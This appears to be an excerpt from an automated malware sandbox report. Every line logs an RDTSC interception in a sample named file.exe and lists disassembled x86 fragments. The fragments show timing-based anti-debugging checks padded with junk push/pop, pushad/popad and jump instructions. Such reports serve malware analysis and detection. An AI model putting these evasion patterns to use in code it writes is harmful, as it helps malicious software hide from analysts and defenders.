                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A5F9 second address: D7A5FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A5FF second address: D7A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEA9 second address: D7FEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FEAF second address: D7FEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EA60 second address: D7EA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EA68 second address: D7EA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7ED13 second address: D7ED1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7ED1F second address: D7ED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDA2529D36Dh 0x0000000b popad 0x0000000c jmp 00007FDA2529D36Fh 0x00000011 pushad 0x00000012 jmp 00007FDA2529D375h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F05D second address: D7F063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F063 second address: D7F069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F1E8 second address: D7F1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDA252A168Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F1FC second address: D7F207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FDA2529D366h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E65E second address: D7E686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA252A1694h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDA252A168Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E686 second address: D7E68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8349A second address: D834A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8605C second address: D86060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86060 second address: D8606C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDA252A1686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43C4F second address: D43C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov ch, 27h 0x00000009 lea eax, dword ptr [ebp+124859B4h] 0x0000000f mov ecx, dword ptr [ebp+122D2B8Ah] 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E7D second address: D43E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D43E86 second address: D43E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4412F second address: D4416B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FDA252A1698h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FDA252A1699h 0x00000016 jmp 00007FDA252A1693h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4448D second address: D44493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44493 second address: D44498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44513 second address: D4452F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4452F second address: D44533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44533 second address: D44547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D370h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44A4C second address: D44A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44A52 second address: D44A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44D91 second address: D44E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov di, 4C40h 0x0000000c lea eax, dword ptr [ebp+124859F8h] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FDA252A1688h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c sub cx, 8554h 0x00000031 push eax 0x00000032 ja 00007FDA252A169Ah 0x00000038 jmp 00007FDA252A1694h 0x0000003d mov dword ptr [esp], eax 0x00000040 jmp 00007FDA252A168Ah 0x00000045 lea eax, dword ptr [ebp+124859B4h] 0x0000004b xor dx, 49E6h 0x00000050 add dword ptr [ebp+122D1C27h], edi 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FDA252A1695h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D44E16 second address: D2F109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D376h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDA2529D368h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call dword ptr [ebp+122D1BF9h] 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007FDA2529D372h 0x00000033 jc 00007FDA2529D366h 0x00000039 push esi 0x0000003a pop esi 0x0000003b popad 0x0000003c js 00007FDA2529D368h 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 push ebx 0x00000045 jmp 00007FDA2529D375h 0x0000004a pop ebx 0x0000004b push edi 0x0000004c pushad 0x0000004d popad 0x0000004e pop edi 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FDA2529D36Eh 0x00000057 je 00007FDA2529D36Ch 0x0000005d jne 00007FDA2529D366h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A33D second address: D8A372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDA252A1686h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FDA252A1691h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007FDA252A1686h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ebx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A372 second address: D8A376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A376 second address: D8A38D instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA252A1686h 0x00000008 jmp 00007FDA252A168Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A38D second address: D8A395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A395 second address: D8A399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A399 second address: D8A3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A3A9 second address: D8A3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A687 second address: D8A68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A7F4 second address: D8A807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A807 second address: D8A80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A80D second address: D8A817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDA252A1686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A988 second address: D8A9BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jg 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jnc 00007FDA2529D379h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDA2529D36Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9BF second address: D8A9CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDA252A1686h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9CE second address: D8A9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A9D8 second address: D8A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDA252A1695h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AB30 second address: D8AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FDA2529D373h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB43B second address: CFB451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FDA252A1688h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB451 second address: CFB45A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F674 second address: D8F683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FDA252A1686h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F683 second address: D8F68D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA2529D366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F68D second address: D8F69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FDA252A1686h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F69D second address: D8F6AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA2529D366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8EF06 second address: D8EF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA252A1694h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F082 second address: D8F0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D376h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F209 second address: D8F20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A46 second address: D91A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA2529D366h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d jns 00007FDA2529D36Ah 0x00000013 pushad 0x00000014 jmp 00007FDA2529D373h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91606 second address: D9160A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91771 second address: D917AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA2529D36Fh 0x00000007 jmp 00007FDA2529D36Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FDA2529D379h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D917AB second address: D917B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FDA252A1686h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A16 second address: D96A1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A1C second address: D96A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A23 second address: D96A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FDA2529D366h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A34 second address: D96A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96769 second address: D96774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9ACEF second address: D9ACF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AE75 second address: D9AE8F instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA2529D36Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B166 second address: D9B18C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A1692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FDA252A168Ch 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B2E4 second address: D9B2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0BC85 second address: D0BC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA085D second address: DA0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0861 second address: DA086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDA252A168Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0983 second address: DA099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007FDA2529D372h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA099C second address: DA09B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA252A1691h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA09B1 second address: DA09B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA09B5 second address: DA09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDA252A168Fh 0x00000010 jmp 00007FDA252A168Ah 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0B26 second address: DA0B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FDA2529D36Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0B39 second address: DA0B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7CF4 second address: DA7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7ED6 second address: DA7EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA252A1686h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7EE2 second address: DA7EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8712 second address: DA8743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jnc 00007FDA252A1686h 0x0000000b jmp 00007FDA252A1698h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jg 00007FDA252A1686h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8743 second address: DA8749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8749 second address: DA874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8FD8 second address: DA8FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8FDC second address: DA8FEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDA252A1686h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA98CC second address: DA98D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA98D2 second address: DA98DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9B5 second address: DAC9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9B9 second address: DAC9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA252A168Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9CC second address: DAC9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC9D0 second address: DAC9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACB2F second address: DACB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D374h 0x00000009 jmp 00007FDA2529D372h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACB5E second address: DACB66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF76 second address: DACF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA2529D36Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDA2529D36Ah 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF93 second address: DACF9F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FDA252A1686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
